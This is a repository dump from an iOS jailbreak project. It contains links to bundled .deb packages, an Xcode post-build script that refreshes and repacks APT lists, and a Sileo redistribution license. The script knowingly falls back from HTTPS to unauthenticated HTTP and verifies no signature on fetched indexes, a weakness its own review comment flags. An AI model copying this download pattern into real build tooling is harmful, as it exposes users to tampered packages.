--------------------------------------------------------------------------------
/apt/tar_1.30-2_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/tar_1.30-2_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/trustinjector_0.4~b5_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/trustinjector_0.4~b5_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/uikittools_2.0.1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/uikittools_2.0.1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/us.diatr.sileorespring_1.1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/us.diatr.sileorespring_1.1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/us.diatr.sillyo_1.4_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/us.diatr.sillyo_1.4_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/wget_1.19.5-2_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/wget_1.19.5-2_iphoneos-arm.deb
--------------------------------------------------------------------------------
/post.sh:
--------------------------------------------------------------------------------
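#!/bin/sh
# Post-build packaging step.
#
# Reads its inputs from the environment (SOURCE_ROOT, TEMP_DIR, TARGET_BUILD_DIR,
# CONTENTS_FOLDER_PATH, INFOPLIST_PATH, CODE_SIGNING_REQUIRED -- these are Xcode
# build-setting names) and does three things:
#   1. When CODE_SIGNING_REQUIRED is "NO", refreshes the APT list files packed in
#      Undecimus/resources/lists.tar.lzma from the network and repacks the
#      archive if anything changed.
#   2. Copies the apt/ package directory and the resources into the built
#      bundle, indexes the packages, and links resources.deb.
#   3. Writes the bundled-resources version and the git-derived package version
#      into the built Info.plist.
#
# NOTE(review): the shebang says /bin/sh but the script relies on bash features
# ([[ ]], arrays, pushd/popd, ${var//pat/rep}). It works where /bin/sh is bash;
# confirm how the build invokes it before changing the interpreter line.

# Get path for dpkg
if [ -f ~/.profile ]; then
    . ~/.profile
fi

# 'set -e' has to be included after (and not before!) .profile's logic or else this happens:
# /Users/travis/.travis/functions: line 221: syntax error near unexpected token `<'
# /Users/travis/.travis/functions: line 221: ` done < <('
set -e

echo "Using Source Root: ${SOURCE_ROOT}"

if [[ "${CODE_SIGNING_REQUIRED}" == "NO" ]]; then
    # Prefer a GNU tar; the repack step below uses GNU-only options.
    if which -s gtar; then
        TAR=gtar
    elif which -s gnutar; then
        TAR=gnutar
    else
        TAR=tar
    fi

    LISTSRC="${SOURCE_ROOT}/Undecimus/resources/lists.tar.lzma"
    pushd "${TEMP_DIR}"
    rm -rf lists
    mkdir lists
    pushd lists
    "${TAR}" xf "${LISTSRC}"
    # Keep a pristine copy so we can tell afterwards whether anything changed.
    cp -a ../lists ../lists-packaged
    # Request headers that identify the client as a Telesphoreo APT fetcher.
    CURLARGS=("-H" "X-Firmware: 11.0" "-H" "X-Machine: iPhone0,0" "-H" "X-Unique-ID: 42" "-H" "User-Agent: Telesphoreo APT-HTTP/1.0.592")
    # Iterate with a glob instead of $(ls) so a list name containing whitespace
    # or glob characters is not split into several words.
    for file in *; do
        [ -e "${file}" ] || continue   # empty directory: the glob stays literal
        echo "${file}"
        tfile="${file}"
        # Package indexes are fetched compressed and unpacked below.
        if [[ "${file%_Packages}" != "${file}" ]]; then
            file="${file}.bz2"
        fi
        # The list file name encodes the URL: every '_' becomes a '/'.
        HTTPURL="http://${file//_//}"
        HTTPSURL="https://${file//_//}"
        # SECURITY(review): a failed HTTPS transfer (connection or TLS error) is
        # retried over plain HTTP, and nothing in this script verifies a
        # signature or checksum on what was fetched before it is repacked into
        # the lists archive that ships with the app. Anyone able to interfere
        # with the build host's network can therefore influence the bundled
        # indexes. Consider removing the fallback or verifying the repository's
        # signed Release data before accepting a list. The fallback is kept here
        # to preserve existing behaviour, but it is no longer silent.
        if ! curl "${CURLARGS[@]}" -z "${tfile}" -o "${file}" "${HTTPSURL}" 2>/dev/null; then
            echo "warning: HTTPS fetch failed for ${file}; retrying over unauthenticated HTTP" >&2
            curl "${CURLARGS[@]}" -z "${tfile}" -o "${file}" "${HTTPURL}" 2>/dev/null
        fi
        # Replace the old uncompressed index with the freshly downloaded one.
        if [[ -f "${file}" && "${file%.bz2}" != "${file}" ]]; then
            if [ -f "${tfile}" ]; then
                rm "${tfile}"
            fi
            bunzip2 "${file}"
        fi
    done
    if diff -qr ../lists-packaged . > /dev/null; then
        echo "Lists unchanged, continuing."
    else
        echo "Lists updated, repacking. This will take a while..."
        if ! "${TAR}" --use-compress-program="lzma -e9" --owner=root --group=wheel -cf "${LISTSRC}" *; then
            echo "We need GNU tar please"
            exit 1
        fi
        echo "Done."
    fi
    popd
    rm -rf lists lists-packaged
    popd
fi # CODE_SIGNING_REQUIRED == NO

# Start from a clean bundle so packages from an earlier build cannot linger.
rm -rf "${TARGET_BUILD_DIR}/${CONTENTS_FOLDER_PATH}/apt"
rm -f "${TARGET_BUILD_DIR}/${CONTENTS_FOLDER_PATH}/"*.deb
rsync -a "${SOURCE_ROOT}/apt" "${SOURCE_ROOT}/Undecimus/resources/"* "${TARGET_BUILD_DIR}/${CONTENTS_FOLDER_PATH}/"

pushd "${TARGET_BUILD_DIR}/${CONTENTS_FOLDER_PATH}/apt"
dpkg-scanpackages . > Packages
cd ..
# Make sure the resources package exists and there is only one of it, instead
# of leaving a dangling or ambiguous link for a later step to trip over.
RESOURCE_DEBS=(apt/jailbreak-resources_*.deb)
if [ "${#RESOURCE_DEBS[@]}" -ne 1 ] || [ ! -f "${RESOURCE_DEBS[0]}" ]; then
    echo "Expected exactly one apt/jailbreak-resources_*.deb, found: ${RESOURCE_DEBS[*]}" >&2
    exit 1
fi
ln -s "${RESOURCE_DEBS[0]}" resources.deb
popd

# The path is quoted like every other use of these variables, so a build
# directory containing spaces does not split into several dpkg arguments.
RESOURCES_VERSION="$(dpkg --info "${TARGET_BUILD_DIR}/${CONTENTS_FOLDER_PATH}/resources.deb" | grep Version: | awk '{print $2}')"
if [ -z "${RESOURCES_VERSION}" ]; then
    echo "dpkg not found or resources.deb missing"
    exit 1
else
    echo "Bundled resources: ${RESOURCES_VERSION}"
fi

# Turn `git describe` output (vX.Y-N-gHASH) into a package-style version:
# drop the leading 'v', join the last two fields as '+N.gHASH', map '%' to '~'.
PACKAGE_VERSION="$(git describe --tags --match="v*" | sed -e 's@-\([^-]*\)-\([^-]*\)$@+\1.\2@;s@^v@@;s@%@~@g')"
if [ -z "${PACKAGE_VERSION}" ]; then
    echo "Could not generate package version"
    exit 1
else
    echo "Package Version: ${PACKAGE_VERSION}"
fi

defaults write "${TARGET_BUILD_DIR}/${INFOPLIST_PATH}" BundledResources "${RESOURCES_VERSION}"
defaults write "${TARGET_BUILD_DIR}/${INFOPLIST_PATH}" CFBundleShortVersionString "${PACKAGE_VERSION}"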
--------------------------------------------------------------------------------
/sileolicense-u0dark.md:
--------------------------------------------------------------------------------
1 | # Sileo Binary Redistribution License
2 | Sileo is (C) 2019, the Sileo Project
3 |
4 | Sileo's source code is confidential and proprietary. It may not be read, copied or distributed without explicit permission of CoolStar. This license does not grant permission to use the Source code.
5 |
6 | Sileo binaries must be distributed free of charge, but are still copyrighted and may not be mirrored or cloned without permission from CoolStar
7 |
8 | # Sileo Binary Redistribution Grant
9 | This addendum grants official permission to "Shady" (also known as nqcshady on github) and "Diatrus" (also known as Diatrus on github) to redistribute Sileo 1.1.0 or higher and its dependencies as part of a jailbreak bootstrap, granted the following conditions are met.
10 |
11 | ### Modifications to Sileo and its dependencies
12 | Redistributors are not allowed to modify packages required by Sileo that are distributed under the Sileo license. These packages must be redistributed in their unmodified form, and clones may not be used.
13 |
14 | ### Paired dependencies
15 | A Sileo version is paired with a certain version of APT. For example, Sileo 1.0 to 1.2.5 (as of July 28th, 2019) are paired with APT 1.8. When each version of Sileo is released, it is effectively paired with the latest version of APT from the Electra/Chimera repo at the time. Users may mismatch Sileo and APT versions to some extent, however official redistributors are required to distribute the correct paired versions of Sileo and APT together.
16 |
17 | ### Other dependencies
18 | Sileo may require certain other closed source dependencies such as uikittools-ng. As stated in the previous clauses, redistributors are required to redistribute the official unmodified packages of these dependencies, so long as they are required to run Sileo
19 |
20 | ### Other software
21 | The official origin repo for Sileo may contain other closed source software under a different license. (E.g. Anemone 3). This license does not provide permission to redistribute the other software. However, the origin repo itself may be added to Sileo so users may continue to download the other software themselves from the origin repo
22 |
23 | ### Origin repo
24 | The origin repo is defined as the official repository that is run by CoolStar to distribute Sileo. As of July 28, 2019, there are 2 origin repos (the Electra and Chimera repos).
25 |
26 | ### Credit
27 | For this license to be valid, credit must be provided to the Sileo Team for Sileo itself, as well as credits for any of the required dependencies that are redistributed (e.g. CoolStar for uikittools-ng).
28 |
29 | ### License
30 | This redistribution grant is only valid when attached with a copy of the Sileo Binary Redistribution license. This grant along with the license must be included with the software distribution package that Sileo is bundled with, along with an official signature.
31 |
32 | ### Signing
33 | For this redistribution grant to be valid, a base64 encoding of an RSA signature (with SHA2-256 digest) signed with CoolStar's private key must be attached to the end of this license, signing the contents of both the license and the redistribution grant up until the period (.) after the date at the end of the redistribution grant that indicates the date that the license has been signed.
34 |
35 | The signature may be validated against the RSA public key at https://gist.github.com/coolstar/a8f4159993be234b24676cb0da5b7dcc to verify that this license is valid.
36 |
37 | 7/28/2019.
38 |
39 | AFAniwN8Un76F5owWZyO1oxiA7RPH0IFoo9QhnTjYvneqcPRoA87289QDpn6eqc2
40 | GZ4VPoDEZeyoU2PivKc1VQ==
--------------------------------------------------------------------------------